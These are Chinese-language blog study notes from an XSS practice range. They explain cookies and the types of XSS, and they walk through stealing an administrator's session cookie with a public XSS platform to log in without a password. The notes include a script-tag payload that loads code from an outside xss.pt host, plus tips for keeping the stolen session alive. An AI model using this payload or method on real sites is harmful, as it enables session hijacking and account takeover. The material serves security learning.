xss获取cookie无密码登录-学习笔记

已于 2022-05-06 20:07:52 修改
阅读量1.6k 收藏
点赞数
分类专栏: 安全 文章标签: xss 安全性测试
于 2022-05-06 20:05:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoXiao_RenHe/article/details/124617555
版权

【靶场:9题,第三章:为了更多的权限!留言板!】

一、cookie简介
二、xss获取cookie
三、无密码登录


1、cookie:指某些网站为了辨别用户身份、进行session跟踪而存储在用户本地终端上的数据(通常经过加密)
   作用:避免频繁输入账号密码。
   使用:我们可以获取他人权限,利用他人什么权限做某些事情。
   如何获取cookie:使用xss。   


2.1、什么是xss
2.2、xss原理/种类
2.3、通过xss平台拿cookie


(1)xss:夸站脚本攻击,是代码注入的一种,它允恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。
          xss是将用户输入的数据当做了 HTML 语句放到了 页面上执行。
          如输入<h1>xss</h1>


(2)xss种类:
    1)、反射型:提交的数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,是非持久型攻击【弹框/弹窗,控制录个视频、拍张照片,弹个窗--可以将这个弹窗url/链接发给别人,让他人来点击】。


    2)、存储型:提交的数据成功的实现了xss,存入了数据库/文件,别人访问这个页面的时候就会自动触发。【输入的语句被存入到数据库了,且执行了Html语句语法】。


    3)、dom型:利用dom树触发xss。【有时也成dom型是一种特殊的反射型】。

(3)随便百度一个xss平台,以尽量小的信息泄露注册【有些符合规则就可以注册】。


     创建--》下一步--》勾选 默认模块,选择keepsession--》下一步--》复制<sCRiPt sRC=//xss.pt/Vz8X></sCrIpT>,复制粘贴到有xss漏洞的地方【F12查看页面html代码,复制的该内容灰色/蓝色显示时,表示有xss漏洞,纯黑色显示时,表示后台管理员查看时,会正常显示出来,否则,惊醒后台管理员,是否被黑了】--》获取到管理员cookie后,输入浏览器cookie中,重新访问url链接,则进入到管理员后台。
 【xss平台选择keepsession选项后,平台频繁的会去访问目标网站,保持获取的cookie不失效】
 【如何找xss漏洞---见框就插,尽量使用温和的方式来试,可以输入<h1>您好</h1>】

XiaoXiao_RenHe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3143
未知攻,何来防。网络安全靶场学习XSS(跨站脚本攻击),使用XSS伪造目标权限。
XSS基础及实战(XSS提取cookie登录的)
qidiandexiaowu
09-06 8015
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
渗透新手福利---xss获取cookie入门级
最新发布
dzqxwzoe的博客
05-14 312
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。然后我们来用这个cookie进行登入不要输入账号密码 我们用burp进行抓包 把这个cookie换成我们刚刚抓到的管理员的cookie。①1000+CTF历届题库(主流和经典的应该都有了)
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1350
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
cookie存储 XSS跨站脚本攻击 localStorage sessionStorage
蒲公英芽的博客
02-12 2805
什么是cookie cookie实际上就是一些信息,这些信息以文件的形式存储在客户端计算机上。当用户访问了某个网站,可以通过cookie向访问者电脑上存储数据。 cookie的主要作用是在浏览器中进行数据的存储,并与服务器互动。 比如:密码 cookie,访当问者首次登陆网站时,需要填写密码密码可被存储于 cookie 中。当他们再次访问网站时,就会从 cookie 中取回密码cookie可...
简单的利用XSS获取用户cookie
shy的博客
10-25 4283
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1211
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,...这只是xss跨站脚本攻击的一些基本知识点和实践案例,更多的信息和技术细节需要进一步学习和研究。
Cookie、Session学习笔记
03-18
这篇学习笔记将深入探讨它们的工作原理、使用场景以及优缺点。 **Cookie** Cookie是一种在客户端(用户的浏览器)和服务器之间传递信息的技术。服务器在响应中设置Cookie,浏览器在后续的请求中携带Cookie返回。...
安全测试学习笔记.pdf
05-28
SQL注入是一种常见的安全漏洞,攻击者通过输入特定的SQL代码来获取未经授权的数据或者对数据库进行操作。防范SQL注入的最有效方法是使用预编译语句和绑定变量,如PHP中的PDO或mysqli。避免直接拼接SQL字符串,同时...
ASP实例开发源码-在线笔记 v1.0.zip
11-16
此外,还可以使用Cookie来持久化用户的登录状态。 2. **数据库交互**:ASP可以与SQL Server、Access等数据库进行交互,以存储和检索用户笔记。通过ADO(ActiveX Data Objects)技术,开发者可以编写SQL查询语句,...
webView2学习笔记
03-20
在本学习笔记中,我们将深入探讨WebView2的关键特性和应用场景,以及如何有效地在你的应用程序中集成和使用它。 1. **WebView2概述** - WebView2是Microsoft Edge Chromium的嵌入式版本,提供了一种在桌面应用中...
js学习笔记-恶意代码识别
09-05
1. 获取和篡改Cookie:通过访问`document.cookies`,攻击者可以查看并修改用户的Cookie信息,进而获取用户的登录状态、个人信息等。 2. 修改页面元素:利用`document.images`或其他DOM元素,攻击者可以改变页面上的...
mark-1:这是php网站,用于共享和学习笔记
05-03
在“mark-1:这是php网站,用于共享和学习笔记”的项目中,我们可以推断这是一个基于PHP搭建的网站平台,旨在提供一个环境供用户分享和学习笔记。这个平台可能包括用户注册、登录笔记发布、分类、搜索等功能,体现...
php框架学习笔记.doc
06-22
PHP 框架学习笔记 php 框架学习笔记主要介绍了 CI 框架的业务流程、控制器、函数、参数、URI 字符串、控制器类、视图、数据库操作、 helpers、redirect 等知识点。 CI 框架的业务流程是从域名或入口开始的,默认...
nodejs-learning-guide, Nodejs学习笔记以及经验总结.zip
09-17
最后,安全方面的知识也非常重要,包括防止XSS和CSRF攻击、输入验证、安全的cookie设置以及HTTPS使用等。 总的来说,"nodejs-learning-guide"是一个全面的Node.js学习资源,不仅讲解基础理论,还包含了大量的实战...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1587
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
xss漏洞之——漏洞利用
wsnbbz的博客
03-04 1191
1.获取cookie进行无密码登陆 原理 网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器 利用 (1)首先登陆一个页面,抓包获取cookie (2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie (3)页面登陆成功,无需密码 2.利用XSS漏洞获取管理员权限(获取...
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3869
XSS漏洞测试cookie获取和钓鱼攻击演示  XSS漏洞测试cookie的窃取和利用 同时讲到get型xss的利用,post型xss的利用  XSS漏洞测试:钓鱼攻击  XSS漏洞测试xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
xss获取cookie攻击
07-28
回答: XSS(跨站脚本攻击)是一种攻击方式,其目的是获取用户的敏感信息,如cookie。常见的XSS攻击手段包括盗用cookie、利用植入Flash获取更高权限、以用户身份执行管理动作等。\[2\]在XSS攻击中,攻击者通过在网页中插入恶意代码,当用户访问该网页时,恶意代码会被执行,从而获取用户的cookie信息。\[3\]为了进行XSS攻击,攻击者需要搭建XSS平台,通过在后台插入恶意代码,当用户访问该后台时,恶意代码会被执行,从而获取用户的cookie信息。\[1\]请注意,XSS攻击是一种违法行为,严重侵犯了用户的隐私和安全,请勿进行此类攻击。 #### 引用[.reference_title] - *1* *2* [渗透测试-跨站脚本攻击xss获取cookie](https://blog.csdn.net/lza20001103/article/details/124385078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络安全实验6 认识XSS & 盗取cookie](https://blog.csdn.net/qq_37672864/article/details/104119221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值